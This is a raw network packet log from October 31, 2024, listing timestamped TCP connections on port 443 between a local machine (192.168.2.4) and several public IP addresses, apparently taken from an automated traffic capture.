                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.648159027 CET44349768216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.648197889 CET49767443192.168.2.4216.239.34.181
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.648582935 CET49768443192.168.2.4216.239.34.181
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.648607016 CET44349768216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.648823023 CET44349767216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.648895979 CET49767443192.168.2.4216.239.34.181
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.649257898 CET44349768216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.649312973 CET49768443192.168.2.4216.239.34.181
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.650309086 CET44349768216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.650357962 CET49768443192.168.2.4216.239.34.181
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.650763035 CET49767443192.168.2.4216.239.34.181
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.650832891 CET44349767216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.650926113 CET49768443192.168.2.4216.239.34.181
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.651005983 CET44349768216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.651271105 CET49767443192.168.2.4216.239.34.181
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.651278973 CET44349767216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.651587963 CET49768443192.168.2.4216.239.34.181
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.651597023 CET44349768216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.746545076 CET49772443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.746598005 CET44349772160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.746723890 CET49772443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.747679949 CET49773443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.747741938 CET44349773160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.747884989 CET49773443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.748367071 CET49774443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.748379946 CET44349774160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.748439074 CET49774443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.748742104 CET49772443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.748761892 CET44349772160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.749144077 CET49773443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.749166012 CET44349773160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.749289036 CET49774443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.749300957 CET44349774160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.826003075 CET44349767216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.826092005 CET49767443192.168.2.4216.239.34.181
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.826114893 CET44349767216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.827347994 CET44349767216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.829214096 CET49767443192.168.2.4216.239.34.181
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.834950924 CET44349768216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.836642981 CET44349768216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.836721897 CET49768443192.168.2.4216.239.34.181
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.956438065 CET44349769172.217.18.2192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.050682068 CET49769443192.168.2.4172.217.18.2
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.108266115 CET49769443192.168.2.4172.217.18.2
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.108288050 CET44349769172.217.18.2192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.108937025 CET49767443192.168.2.4216.239.34.181
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.108963966 CET44349767216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.109577894 CET44349769172.217.18.2192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.109591961 CET44349769172.217.18.2192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.109656096 CET49769443192.168.2.4172.217.18.2
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.111921072 CET49768443192.168.2.4216.239.34.181
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.111943960 CET44349768216.239.34.181192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.112232924 CET49769443192.168.2.4172.217.18.2
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.112312078 CET44349769172.217.18.2192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.112416983 CET49769443192.168.2.4172.217.18.2
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.155339003 CET44349769172.217.18.2192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.159701109 CET49769443192.168.2.4172.217.18.2
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.159727097 CET44349769172.217.18.2192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.340022087 CET49769443192.168.2.4172.217.18.2
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.379406929 CET44349769172.217.18.2192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.460402012 CET49769443192.168.2.4172.217.18.2
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.460454941 CET44349769172.217.18.2192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.484980106 CET49769443192.168.2.4172.217.18.2
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.485061884 CET44349769172.217.18.2192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.485122919 CET49769443192.168.2.4172.217.18.2
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.490820885 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.490864992 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.490987062 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.491319895 CET49778443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.491358995 CET44349778151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.491471052 CET49778443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.491549015 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.491565943 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.491797924 CET49778443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.491812944 CET44349778151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.494559050 CET49781443192.168.2.464.233.167.156
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.494584084 CET4434978164.233.167.156192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.494671106 CET49781443192.168.2.464.233.167.156
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.495035887 CET49781443192.168.2.464.233.167.156
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.495052099 CET4434978164.233.167.156192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.497339010 CET49782443192.168.2.4185.15.59.240
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.497355938 CET44349782185.15.59.240192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.497420073 CET49782443192.168.2.4185.15.59.240
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.497925997 CET49782443192.168.2.4185.15.59.240
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.497941971 CET44349782185.15.59.240192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.498230934 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.498258114 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.498326063 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.498739004 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.498758078 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.591464043 CET44349774160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.592133999 CET49774443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.592144966 CET44349774160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.593607903 CET44349774160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.593684912 CET49774443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.594237089 CET49774443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.594319105 CET44349774160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.594645977 CET49774443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.594655037 CET44349774160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.606700897 CET44349773160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.606959105 CET49773443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.606966972 CET44349772160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.606997967 CET44349773160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.607139111 CET49772443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.607148886 CET44349772160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.607336998 CET44349773160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.608107090 CET49773443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.608174086 CET44349773160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.608223915 CET44349772160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.608284950 CET49772443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.608328104 CET49773443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.608762026 CET49772443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.608827114 CET44349772160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.608865023 CET49772443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.642745018 CET49774443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.651333094 CET44349772160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.651348114 CET44349773160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.739556074 CET49772443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.739567995 CET44349772160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.841418982 CET44349774160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.841449976 CET44349774160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.841516972 CET49774443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.841531038 CET44349774160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.843861103 CET49774443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.843900919 CET44349774160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.844075918 CET44349774160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.844125032 CET49774443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.844151020 CET49774443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.845155001 CET49772443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.859052896 CET44349773160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.859070063 CET44349773160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.859117985 CET49773443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.859129906 CET44349773160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.859507084 CET44349772160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.859530926 CET44349772160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.859580994 CET49772443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.859600067 CET44349772160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.859643936 CET49772443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.860622883 CET49773443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.860661030 CET44349773160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.860759020 CET49773443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.864833117 CET49772443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.864873886 CET44349772160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.864928007 CET49772443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.994617939 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.994651079 CET44349672173.222.162.32192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.115098953 CET44349778151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.115277052 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.121834040 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.121854067 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.122232914 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.141519070 CET49778443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.141537905 CET44349778151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.141956091 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.142075062 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.142585039 CET44349778151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.142657042 CET49778443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.149933100 CET49778443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.150002003 CET44349778151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.150011063 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.150405884 CET49778443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.150419950 CET44349778151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.191356897 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.238749027 CET49778443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.274557114 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.274712086 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.274754047 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.274760962 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.274777889 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.274820089 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.274827957 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.275402069 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.275450945 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.275460005 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.275652885 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.275696039 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.275710106 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.277782917 CET44349778151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.277852058 CET44349778151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.277887106 CET49778443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.277905941 CET44349778151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.277971029 CET49778443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.294781923 CET49778443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.294804096 CET44349778151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.343756914 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.343770027 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.346087933 CET4434978164.233.167.156192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.346332073 CET49781443192.168.2.464.233.167.156
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.346369982 CET4434978164.233.167.156192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.347362995 CET4434978164.233.167.156192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.347421885 CET49781443192.168.2.464.233.167.156
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.348715067 CET49781443192.168.2.464.233.167.156
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.348778963 CET4434978164.233.167.156192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.348925114 CET49781443192.168.2.464.233.167.156
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.365115881 CET44349782185.15.59.240192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.366353035 CET49782443192.168.2.4185.15.59.240
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.366362095 CET44349782185.15.59.240192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.366410017 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.367202044 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.367219925 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.367878914 CET44349782185.15.59.240192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.367933035 CET49782443192.168.2.4185.15.59.240
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.367939949 CET44349782185.15.59.240192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.368016005 CET49782443192.168.2.4185.15.59.240
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.368597984 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.368664026 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.371217966 CET49782443192.168.2.4185.15.59.240
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.371298075 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.371362925 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.371400118 CET44349782185.15.59.240192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.372170925 CET49782443192.168.2.4185.15.59.240
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.372179031 CET44349782185.15.59.240192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.372523069 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.372642040 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.372829914 CET49783443192.168.2.4142.250.185.142
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.372839928 CET44349783142.250.185.142192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.391824007 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.391871929 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.391871929 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.391885042 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.391927958 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.391937971 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.392133951 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.392265081 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.392271996 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.392553091 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.392587900 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.392627954 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.392633915 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.392644882 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.392684937 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.392693043 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.392735958 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.393506050 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.393580914 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.393621922 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.393659115 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.393668890 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.393676996 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.393697977 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.394542933 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.394596100 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.394602060 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.394609928 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.394654036 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.394695997 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.394702911 CET44349777151.101.193.229192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.394742966 CET49777443192.168.2.4151.101.193.229
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.395329952 CET4434978164.233.167.156192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.447951078 CET49782443192.168.2.4185.15.59.240
